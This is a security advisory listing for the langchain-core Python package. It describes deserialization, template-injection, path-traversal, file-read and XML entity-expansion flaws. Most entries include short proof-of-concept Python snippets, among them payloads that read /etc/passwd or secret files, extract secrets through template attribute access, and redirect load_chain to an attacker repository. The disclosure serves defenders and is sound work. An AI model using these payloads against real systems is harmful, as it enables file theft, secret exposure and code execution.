Advisories for the PyPI `langchain-core` package

2026

LangChain vulnerable to unsafe deserialization of attacker-controlled objects through overly broad `load()` allowlists

LangChain contains older runtime code paths that deserialize run inputs, run outputs, or other application-controlled payloads using overly broad object allowlists. These paths may call `load()` with `allowed_objects="all"`. This does not enable arbitrary Python object deserialization, but it does allow any trusted LangChain-serializable object to be revived, which is broader than these runtime paths require. As a result, attacker-supplied LangChain serialized constructor dictionaries may cause trusted runtime paths to instantiate …
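
A hedged sketch of the payload shape follows; the `allowed_objects` keyword is taken from the advisory text, and the revived class is a benign stand-in, not a working exploit:

```python
# Minimal sketch of the deserialization shape described above. The
# allowed_objects keyword comes from the advisory text; the payload class
# is a benign stand-in.
from langchain_core.load import load

# Attacker-supplied data in the LangChain serialization format: "lc" marks
# a serialized object, and "type": "constructor" asks the loader to import
# and instantiate the class named by "id".
payload = {
    "lc": 1,
    "type": "constructor",
    "id": ["langchain", "prompts", "prompt", "PromptTemplate"],
    "kwargs": {"template": "{x}", "input_variables": ["x"]},
}

# With the broad allowlist, any trusted LangChain-serializable class can be
# revived from attacker-controlled input, not just the types this runtime
# path actually needs.
obj = load(payload, allowed_objects="all")
print(type(obj))  # a revived PromptTemplate on affected versions
```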

LangChain has incomplete f-string validation in prompt templates

LangChain's f-string prompt-template validation was incomplete in two respects. First, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as PromptTemplate. In particular, DictPromptTemplate and ImagePromptTemplate could accept templates containing attribute-access or indexing expressions and subsequently evaluate those expressions during formatting. Examples of the affected shape include `"{message.additional_kwargs[secret]}"` and `"https://example.com/{image.__class__.__name__}.png"`. Second, f-string validation based on parsed top-level field names did not reject nested …
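
The hazard comes directly from `str.format` semantics, which f-string templates share. A minimal self-contained sketch (the class and field names are illustrative stand-ins, not library internals):

```python
# Minimal sketch of why f-string-style templates are dangerous when the
# template *string* is attacker-influenced: str.format permits attribute
# traversal and indexing. The Message class is an illustrative stand-in.
class Message:
    def __init__(self) -> None:
        self.additional_kwargs = {"secret": "s3cr3t-token"}

msg = Message()

# Attribute traversal plus indexing, the first shape quoted above:
print("{message.additional_kwargs[secret]}".format(message=msg))
# -> s3cr3t-token

# Dunder traversal reaches object internals, the second shape quoted above:
print("https://example.com/{image.__class__.__name__}.png".format(image=msg))
# -> https://example.com/Message.png
```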

LangChain Core has Path Traversal vulnerabilities in legacy `load_prompt` functions

Multiple functions in `langchain_core.prompts.loading` read files from paths embedded in deserialized config dicts without validating against directory traversal or absolute path injection. When an application passes user-influenced prompt configurations to `load_prompt()` or `load_prompt_from_config()`, an attacker can read arbitrary files on the host filesystem, constrained only by file-extension checks (`.txt` for templates, `.json`/`.yaml` for examples). Note: The affected functions (`load_prompt`, `load_prompt_from_config`, and the `.save()` method on prompt classes) are undocumented legacy …
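
A hedged sketch of the traversal shape; the config keys follow the legacy prompt-config format, the path is illustrative, and the code assumes an affected version:

```python
# Minimal sketch of the traversal shape described above. Do not feed
# untrusted configs to these legacy loaders.
from langchain_core.prompts.loading import load_prompt_from_config

attacker_config = {
    "_type": "prompt",
    "input_variables": [],
    # "../" traversal: on affected versions, only the .txt extension check
    # constrains this path.
    "template_path": "../../../../home/app/.config/secret-notes.txt",
}

prompt = load_prompt_from_config(attacker_config)
print(prompt.template)  # contents of the traversed file
```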

2025

LangChain serialization injection vulnerability enables secret extraction in dumps/loads APIs

A serialization injection vulnerability exists in LangChain's `dumps()` and `dumpd()` functions. The functions do not escape dictionaries with `lc` keys when serializing free-form dictionaries. The `lc` key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.
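
A hedged sketch of the round-trip; the injected class is a benign stand-in:

```python
# Minimal sketch of the injection: on affected versions, dumps() does not
# escape a user dict that already carries the "lc" marker, so loads()
# revives it as an object instead of returning plain data.
from langchain_core.load import dumps, loads

user_supplied = {
    "lc": 1,
    "type": "constructor",
    "id": ["langchain", "prompts", "prompt", "PromptTemplate"],
    "kwargs": {"template": "injected", "input_variables": []},
}
record = {"note": "free-form application data", "payload": user_supplied}

restored = loads(dumps(record))
# On affected versions, restored["payload"] is a PromptTemplate instance,
# not the dict the application stored.
print(type(restored["payload"]))
```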

LangChain Vulnerable to Template Injection via Attribute Access in Prompt Templates

Attackers who can control template strings (not just template variables) can: access Python object attributes and internal properties via attribute traversal; extract sensitive information from object internals (e.g., `__class__`, `__globals__`); and potentially escalate to more severe attacks depending on the objects passed to templates …
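
A hedged sketch of the trust boundary, using PromptTemplate directly; patched versions reject the attribute-access template at construction time:

```python
# Minimal sketch of the trust boundary: template *variables* are inert
# data, while template *strings* behave like code.
from langchain_core.prompts import PromptTemplate

# Safe: the attacker controls only a variable value; braces inside the
# value are not re-interpreted.
safe = PromptTemplate.from_template("Hello {name}")
print(safe.format(name="{obj.__class__}"))  # prints the braces literally

# Dangerous on affected versions: the attacker controls the template
# string itself, so formatting traverses object attributes. Patched
# versions raise at construction instead.
evil = PromptTemplate.from_template("{obj.__class__.__mro__}")
print(evil.format(obj=object()))
```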

langchain-core allows unauthorized users to read arbitrary files from the host file system

A vulnerability in langchain-core versions >=0.1.17,<0.1.53, >=0.2.0,<0.2.43, and >=0.3.0,<0.3.15 allows unauthorized users to read arbitrary files from the host file system. The issue arises from the ability to create `langchain_core.prompts.ImagePromptTemplate` instances (and by extension `langchain_core.prompts.ChatPromptTemplate` instances) with input variables that can read any user-specified path from the server file system. If the outputs of these prompt templates are exposed to the user, either directly or through downstream model outputs, it can lead …
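
A hedged sketch of the reported shape, assuming affected-version behavior where a local filesystem path flowing through an input variable was read from disk and inlined into the message; the exact message structure is illustrative:

```python
# Minimal sketch of the reported shape. On affected versions a local path
# supplied through an input variable was read from the server's disk and
# inlined as base64 image data; patched versions refuse local paths here.
from langchain_core.prompts import ChatPromptTemplate

prompt = ChatPromptTemplate.from_messages([
    ("human", [{"type": "image_url", "image_url": "{user_supplied}"}]),
])

# On affected versions this read /etc/passwd off the server file system.
msgs = prompt.format_messages(user_supplied="/etc/passwd")
print(msgs[0].content)
```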

2024

LangChain's XMLOutputParser vulnerable to XML Entity Expansion

The XMLOutputParser in LangChain uses the `etree` module from the standard Python library's `xml` package, which has known XML vulnerabilities; see https://docs.python.org/3/library/xml.html. This primarily affects users who combine an LLM (or agent) with the XMLOutputParser and expose the component via an endpoint on a web service. This would allow a malicious party to attempt to manipulate the LLM into producing a malicious payload for the parser that would compromise …
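
A hedged sketch of the exposure, with the entity expansion kept deliberately tiny so it is harmless to run:

```python
# Minimal sketch: stdlib etree expands internal DTD entities, so an LLM
# coaxed into emitting an entity-expansion ("billion laughs") payload can
# exhaust memory in the parser on affected versions. Patched versions can
# reject the DTD instead.
from langchain_core.output_parsers import XMLOutputParser

llm_output = """<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
]>
<lolz>&lol2;</lolz>"""

parser = XMLOutputParser()
print(parser.parse(llm_output))  # entities expand during parsing
```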

LangChain directory traversal vulnerability

LangChain through 0.1.10 allows `../` directory traversal by an actor who is able to control the final part of the path parameter in a `load_chain` call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution.
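
A hedged sketch of the reported shape; the hub path is illustrative, and `load_chain` lives in the legacy `langchain` package rather than `langchain-core`:

```python
# Minimal sketch of the traversal described above. load_chain is a
# deprecated legacy loader; the path below is illustrative.
from langchain.chains import load_chain

# The "lc://" scheme was intended to resolve only inside the
# hwchase17/langchain-hub repository. On affected versions, "../" in the
# caller-controlled tail of the path escaped that root, so the loader
# could fetch and execute an attacker-hosted chain config.
chain = load_chain("lc://chains/../../../../attacker/repo/chain.json")
```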